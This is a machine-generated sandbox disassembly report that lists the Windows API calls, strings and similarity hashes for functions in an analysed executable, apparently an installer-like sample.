• Instruction Fuzzy Hash: 80C146318012999EDF21EBA4D845BEDBBB4AF15344F0421EAE54DB3282DB705B89CF61
APIs
• __EH_prolog3_GS.LIBCMT ref: 00E70E50
• GetFullPathNameW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,00000030), ref: 00E70E85
• GetFullPathNameW.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,00000030), ref: 00E70EC4
• _wcslen.LIBCMT ref: 00E70ED4
• GetFullPathNameW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,00000030), ref: 00E70F51
• GetFullPathNameW.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,00000030), ref: 00E70F93
• _wcslen.LIBCMT ref: 00E70FA3
Memory Dump Source
• Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
• Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
Similarity
• API ID: FullNamePath$_wcslen$H_prolog3_
• String ID:
• API String ID: 840513527-0
• Opcode ID: 00b09547c62aebb43ff7f429b2139fece026f3987d5a4f4d5afca5b97b4ceaf3
• Instruction ID: 17e20f3e91a4b617e7f43e9121411d3469e8e81c310790a3a947d05074a6a1fb
• Opcode Fuzzy Hash: 00b09547c62aebb43ff7f429b2139fece026f3987d5a4f4d5afca5b97b4ceaf3
• Instruction Fuzzy Hash: 6C617971A00208EBCF15DFA9D885EEEBBB9EF84710F14A15AF418F7250DB349944CB61
                                                                                              APIs
                                                                                              • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00E969AE,?,00000000,?,00000000,00000000), ref: 00E9627B
                                                                                              • __fassign.LIBCMT ref: 00E962F6
                                                                                              • __fassign.LIBCMT ref: 00E96311
                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00E96337
                                                                                              • WriteFile.KERNEL32(?,?,00000000,00E969AE,00000000,?,?,?,?,?,?,?,?,?,00E969AE,?), ref: 00E96356
                                                                                              • WriteFile.KERNEL32(?,?,00000001,00E969AE,00000000,?,?,?,?,?,?,?,?,?,00E969AE,?), ref: 00E9638F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                              • String ID:
                                                                                              • API String ID: 1324828854-0
                                                                                              • Opcode ID: 2b8b32403be7fb7b098c087a1c5ee95bd10224ee27696834d5cfeba3e81755a7
                                                                                              • Instruction ID: acb13307695b34c4c65ba4ecd5825802c7c44df3df069d9b72b0cfa125007935
                                                                                              • Opcode Fuzzy Hash: 2b8b32403be7fb7b098c087a1c5ee95bd10224ee27696834d5cfeba3e81755a7
                                                                                              • Instruction Fuzzy Hash: B9518D71A00209AFDF10CFA9DC95AEEBBF8EB49310F14511BE956F7291E770A944CB60
                                                                                              APIs
                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00E893F7
                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 00E893FF
                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00E89488
                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00E894B3
                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00E89508
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                              • String ID: csm
                                                                                              • API String ID: 1170836740-1018135373
                                                                                              • Opcode ID: 51de46fea8e8665aa1978b9bdb5ddceece89de9d760318e8e035ea7ad14620c9
                                                                                              • Instruction ID: f757fc893455486148ff676e60e203632447734b4944d431301453ed7eaa5d67
                                                                                              • Opcode Fuzzy Hash: 51de46fea8e8665aa1978b9bdb5ddceece89de9d760318e8e035ea7ad14620c9
                                                                                              • Instruction Fuzzy Hash: 46416434E002089FCF10EF68C885AAE7BF5AF45318F189156E82D7B393D735A916CB91
                                                                                              APIs
                                                                                                • Part of subcall function 00E93518: _free.LIBCMT ref: 00E93541
                                                                                              • _free.LIBCMT ref: 00E935A2
                                                                                                • Part of subcall function 00E903D4: RtlFreeHeap.NTDLL(00000000,00000000,?,00E93546,?,00000000,?,00000000,?,00E9356D,?,00000007,?,?,00E9396A,?), ref: 00E903EA
                                                                                                • Part of subcall function 00E903D4: GetLastError.KERNEL32(?,?,00E93546,?,00000000,?,00000000,?,00E9356D,?,00000007,?,?,00E9396A,?,?), ref: 00E903FC
                                                                                              • _free.LIBCMT ref: 00E935AD
                                                                                              • _free.LIBCMT ref: 00E935B8
                                                                                              • _free.LIBCMT ref: 00E9360C
                                                                                              • _free.LIBCMT ref: 00E93617
                                                                                              • _free.LIBCMT ref: 00E93622
                                                                                              • _free.LIBCMT ref: 00E9362D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: ab47a35b4bbe4dfe32203c1e62b6aae3bc761e273b4d797f2b7891905fbb6212
                                                                                              • Instruction ID: 9fe2f0c8d2399419386c7f806066c330fbe8e3d123a109884e96f9f01ac5e6bb
                                                                                              • Opcode Fuzzy Hash: ab47a35b4bbe4dfe32203c1e62b6aae3bc761e273b4d797f2b7891905fbb6212
                                                                                              • Instruction Fuzzy Hash: C111B771540B04BBDF30BBB0CC46FCB77D9AF08700F816815B299B6153DA75AA058790
                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00E8C5A2,00E8C5A2,?,?,?,00E9185A,00000001,00000001,C5E85006), ref: 00E91663
                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00E9185A,00000001,00000001,C5E85006,?,?,?), ref: 00E916E9
                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,C5E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00E917E3
                                                                                              • __freea.LIBCMT ref: 00E917F0
                                                                                                • Part of subcall function 00E9040E: RtlAllocateHeap.NTDLL(00000000,00E8535E,?,?,00E86C16,?,?,?,?,?,00E85269,00E8535E,?,?,?,?), ref: 00E90440
                                                                                              • __freea.LIBCMT ref: 00E917F9
                                                                                              • __freea.LIBCMT ref: 00E9181E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1414292761-0
                                                                                              • Opcode ID: 3df27d877adc7bcd124b1ddfcfd39ae64d30d1b30b988c064d7e0a8ad0456876
                                                                                              • Instruction ID: 09d945d0d7712557473f961e2a5df40e0e46f77da79c488243771b69fa3c6ef0
                                                                                              • Opcode Fuzzy Hash: 3df27d877adc7bcd124b1ddfcfd39ae64d30d1b30b988c064d7e0a8ad0456876
                                                                                              • Instruction Fuzzy Hash: 1651D172600217AFEF259FA4CC81EBB77EAEB45754F2456AAFC04F6151EB34DC808660
                                                                                              APIs
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?), ref: 00E77B06
                                                                                                • Part of subcall function 00E7067E: GetVersionExW.KERNEL32(?), ref: 00E706AF
                                                                                              • LocalFileTimeToFileTime.KERNEL32(?,?,?,?), ref: 00E77B2A
                                                                                              • FileTimeToSystemTime.KERNEL32(?,?,?,?), ref: 00E77B44
                                                                                              • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?,?,?), ref: 00E77B57
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 00E77B67
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 00E77B77
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: Time$File$System$Local$SpecificVersion
                                                                                              • String ID:
                                                                                              • API String ID: 2092733347-0
                                                                                              • Opcode ID: a457731115a899b2545130b44c44aeddd814803bc40945d932d70a6fd4044211
                                                                                              • Instruction ID: 23e035432cdf171fcb408ebc2f139257b2c17418ac37704b3c0f240b3bc35238
                                                                                              • Opcode Fuzzy Hash: a457731115a899b2545130b44c44aeddd814803bc40945d932d70a6fd4044211
                                                                                              • Instruction Fuzzy Hash: 3F4105761082059FC704DFA9C88499BB7F8BF98714F04991BF999D7220E730D948CBAA
                                                                                              APIs
                                                                                              • FileTimeToSystemTime.KERNEL32(?,?,522FB702,?,?,?,?,00E9AA27,000000FF), ref: 00E7F38A
                                                                                              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?,?,?,00E9AA27,000000FF), ref: 00E7F399
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,00E9AA27,000000FF), ref: 00E7F3A7
                                                                                              • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,00E9AA27,000000FF), ref: 00E7F3B5
                                                                                              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032,?,?,?,?,00E9AA27,000000FF), ref: 00E7F3D0
                                                                                              • GetTimeFormatW.KERNEL32(00000400,?,?,00000000,?,00000032,?,?,?,?,00E9AA27,000000FF), ref: 00E7F3FA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: Time$System$File$Format$DateLocalSpecific
                                                                                              • String ID:
                                                                                              • API String ID: 909090443-0
                                                                                              • Opcode ID: 979ce0adf7a8eafd26eae93815e46414b633485cd26bdf8b2a27ccfde23a733f
                                                                                              • Instruction ID: 7bf0b73c0f612b60b23757202563e6292eb47a2e6afc7affb8e9bfa0ebbe267d
                                                                                              • Opcode Fuzzy Hash: 979ce0adf7a8eafd26eae93815e46414b633485cd26bdf8b2a27ccfde23a733f
                                                                                              • Instruction Fuzzy Hash: CE311DB2501188AFDB11EFA5DC45EEF77BCFB19754F00412AF905E6141EB74AA08CB60
                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 00E831A4
                                                                                                • Part of subcall function 00E614A7: _wcslen.LIBCMT ref: 00E614B8
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 00E834F2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$H_prolog3_
                                                                                              • String ID: .lnk$0$lnk$S
                                                                                              • API String ID: 2000020936-3846212212
                                                                                              • Opcode ID: ddb2ba17ea66b818c62a56137ad10b2c3bccdcae6bde80564991cfb45d54b338
                                                                                              • Instruction ID: 39d0de3060103841c4b02407273362da1ac651dbba035d5b224056a48879203e
                                                                                              • Opcode Fuzzy Hash: ddb2ba17ea66b818c62a56137ad10b2c3bccdcae6bde80564991cfb45d54b338
                                                                                              • Instruction Fuzzy Hash: DAE137719002589EDB25EBA4D885BDDB7B8AF08344F1424EAE50DB7291DB349B88CF60
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,?,00E89771,00E896CC,00E86A64), ref: 00E89788
                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00E89796
                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00E897AF
                                                                                              • SetLastError.KERNEL32(00000000,00E89771,00E896CC,00E86A64), ref: 00E89801
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                              • String ID:
                                                                                              • API String ID: 3852720340-0
                                                                                              • Opcode ID: 0b795611c13993bb4b25a4d3e88d96468b3f7769c6362b44108313e41ef328f8
                                                                                              • Instruction ID: 0803752f044480ea2fd5e89a8020c1a01e1c6ecb80cc27aae3796da7617966e4
                                                                                              • Opcode Fuzzy Hash: 0b795611c13993bb4b25a4d3e88d96468b3f7769c6362b44108313e41ef328f8
                                                                                              • Instruction Fuzzy Hash: 0D01F13292D2129EA6243EBABC9557A2794EB46379738133BF02D710E2EA125C04D354
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,?,00E8B581,?,00EAE088,?,00E8AE80,?,00EAE088,?,00000007), ref: 00E90009
                                                                                              • _free.LIBCMT ref: 00E9003C
                                                                                              • _free.LIBCMT ref: 00E90064
                                                                                              • SetLastError.KERNEL32(00000000,00EAE088,?,00000007), ref: 00E90071
                                                                                              • SetLastError.KERNEL32(00000000,00EAE088,?,00000007), ref: 00E9007D
                                                                                              • _abort.LIBCMT ref: 00E90083
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$_free$_abort
                                                                                              • String ID:
                                                                                              • API String ID: 3160817290-0
                                                                                              • Opcode ID: b38ffaaa5988a8aa984052e7ec7ae564565391ea14a8e4894bc7523c37cf4e5e
                                                                                              • Instruction ID: 3d1d860afc714ba064873c4468644f061d5849237d6feaf5f56a7ccc829b8f0d
                                                                                              • Opcode Fuzzy Hash: b38ffaaa5988a8aa984052e7ec7ae564565391ea14a8e4894bc7523c37cf4e5e
                                                                                              • Instruction Fuzzy Hash: EEF0C835104601AFCF2273396C06F6F26969FC1775F652515F51CB2192FE348C468224
                                                                                              APIs
                                                                                              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00E83FDB
                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00E83FF5
                                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E84006
                                                                                              • TranslateMessage.USER32(?), ref: 00E84010
                                                                                              • DispatchMessageW.USER32(?), ref: 00E8401A
                                                                                              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00E84025
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                               • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                                                              • String ID:
                                                                                              • API String ID: 2148572870-0
                                                                                              • Opcode ID: 84e1107da89649a2e047c95b7372e72e9d8dc79f2e2c9d5d437f99335f036523
                                                                                              • Instruction ID: 712e3ce2d7a7dcb74f8ea440829ce45946ab6df0b439cfa16057a59740b50c56
                                                                                              • Opcode Fuzzy Hash: 84e1107da89649a2e047c95b7372e72e9d8dc79f2e2c9d5d437f99335f036523
                                                                                              • Instruction Fuzzy Hash: 92F03C72E0112AABCB207BA2EC4CEDF7E6DEF85791F104112B64AF2090E6349545CBA0
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,00000066), ref: 00E826A9
                                                                                              • SendMessageW.USER32(00000000,00000143,00000000,00EB5380), ref: 00E826D6
                                                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00E82702
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 00E834F2
                                                                                              Strings
                                                                                              • Software\Microsoft\Windows\CurrentVersion, xrefs: 00E825F4
                                                                                              • ProgramFilesDir, xrefs: 00E825E0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                               • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$H_prolog3_Item
                                                                                              • String ID: ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                                              • API String ID: 4098331016-2634093826
                                                                                              • Opcode ID: d6b63be92bdad3e9a830cad72d35259d57f32e98bf5c6a951fef8c220ec095ba
                                                                                              • Instruction ID: 23326d73bf5d484e97aae3545d2935ec6908ed65ca1a2b5946d6594c84af104d
                                                                                              • Opcode Fuzzy Hash: d6b63be92bdad3e9a830cad72d35259d57f32e98bf5c6a951fef8c220ec095ba
                                                                                              • Instruction Fuzzy Hash: 59818F31940258DFDF25EBE0D891BEDB7B8AF18354F042199E60EB7181EB705B89CB61
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 00E6A307
                                                                                              • GetLastError.KERNEL32(00000054,?,?,?,?,?,00E6D303,?,?,?,?,?,?,?,522FB702,00000049), ref: 00E6A427
                                                                                                • Part of subcall function 00E6AC11: GetCurrentProcess.KERNEL32(00000020,?), ref: 00E6AC2E
                                                                                                • Part of subcall function 00E6AC11: GetLastError.KERNEL32 ref: 00E6AC72
                                                                                                • Part of subcall function 00E6AC11: CloseHandle.KERNEL32(?), ref: 00E6AC81
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                               • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$CloseCurrentH_prolog3_HandleProcess
                                                                                              • String ID: SeRestorePrivilege$SeSecurityPrivilege$K
                                                                                              • API String ID: 2235100918-4013019307
                                                                                              • Opcode ID: d7fb530664b7d30d602d1bfe61cb33bb3800d35a9cfa7b22fa18f54b4c9ccd22
                                                                                              • Instruction ID: bd9c26a79b3439ec1106000e8509050a7767b3f7163b31657eaf30a8a0dc353e
                                                                                              • Opcode Fuzzy Hash: d7fb530664b7d30d602d1bfe61cb33bb3800d35a9cfa7b22fa18f54b4c9ccd22
                                                                                              • Instruction Fuzzy Hash: 98417F71D40208AFDF14EBA8E885AEDB7F8AB49354F08602AF505B7341DBB599448B22
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                               • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$H_prolog3
                                                                                              • String ID: &nbsp;$<br>
                                                                                              • API String ID: 1035939448-26742755
                                                                                              • Opcode ID: 86e9a1a496d073d2f7da9523a88cf9c8e483737a14779296b3082d91cf471487
                                                                                              • Instruction ID: fc69d4fc5344a6e83de05f4257967516313d53faae6cf0731726ddbef3f6c76a
                                                                                              • Opcode Fuzzy Hash: 86e9a1a496d073d2f7da9523a88cf9c8e483737a14779296b3082d91cf471487
                                                                                              • Instruction Fuzzy Hash: E0415D30B082119BDB25AF50DD81B3D7372FF95704F20E52AE50AAB281EBB19992C7D1
                                                                                              APIs
                                                                                              • LoadBitmapW.USER32(00000065), ref: 00E807F5
                                                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 00E8081A
                                                                                              • DeleteObject.GDI32(00000000), ref: 00E8084C
                                                                                              • DeleteObject.GDI32(00000000), ref: 00E8086F
                                                                                                • Part of subcall function 00E7EBD3: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00E80845,00000066), ref: 00E7EBE6
                                                                                                • Part of subcall function 00E7EBD3: SizeofResource.KERNEL32(00000000,?,?,?,00E80845,00000066), ref: 00E7EBFD
                                                                                                • Part of subcall function 00E7EBD3: LoadResource.KERNEL32(00000000,?,?,?,00E80845,00000066), ref: 00E7EC14
                                                                                                • Part of subcall function 00E7EBD3: LockResource.KERNEL32(00000000,?,?,?,00E80845,00000066), ref: 00E7EC23
                                                                                                • Part of subcall function 00E7EBD3: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00E80845,00000066), ref: 00E7EC3E
                                                                                                • Part of subcall function 00E7EBD3: GlobalLock.KERNEL32(00000000), ref: 00E7EC4F
                                                                                                • Part of subcall function 00E7EBD3: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00E7EC73
